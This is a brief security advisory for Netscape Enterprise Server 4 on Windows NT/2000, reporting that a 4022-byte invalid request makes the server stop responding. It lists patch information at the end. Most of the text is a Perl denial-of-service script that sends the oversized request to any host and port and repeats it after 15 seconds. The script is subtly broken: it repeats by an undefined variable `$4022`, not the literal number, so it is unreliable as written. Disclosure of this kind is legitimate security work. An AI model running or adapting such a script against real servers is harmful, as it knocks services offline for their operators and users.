Vulnerability
Netscape Enterprise Server
Affected
Netscape Enterprise Server 4/SP7 (possibly 4/SP3-SP7) running on Windows NT and Win2k
Description
Following is based on a Digizen Security Group advisory. By
sending an invalid method or URI request of 4022 bytes Netscape
Enterprise Server will stop responding to requests.
The code:
#!/usr/bin/perl
use IO::Socket;
if (@ARGV < 2) {
print "Usage: host port\n";
exit;
}
$overflow = "A" x $4022;
&connect;
sleep(15);
&connect;
exit;
################################################
sub connect() {
$sock= IO::Socket::INET->new(Proto=>"TCP",
PeerAddr=>$ARGV[0],
PeerPort=>"$ARGV[1]",)
or die "Cant connect to $ARGV[0]: $!\n";
$sock->autoflush(1);
print $sock "$overflow /index.html HTTP/1.0\n\n";
$response=<$sock>;
print "$response";
while(<$sock>){
print "$_\n";
}
close $sock;
}
Solution
To ensure the stability of our customer's environments iPlanet has
made available an NSAPI patch that can be applied to iPlanet Web
Server, Enterprise Edition version 4.1 Service Packs 3 through 7.
The NSAPI patch is available at
http://www.iplanet.com/products/iplanet_web_enterprise/iwsalert5.11.html
This issue will also be addressed by the release of iPlanet Web
Server, Enterprise Edition version 4.1 Service Pack 8.
Credits
-- UnKnown --
|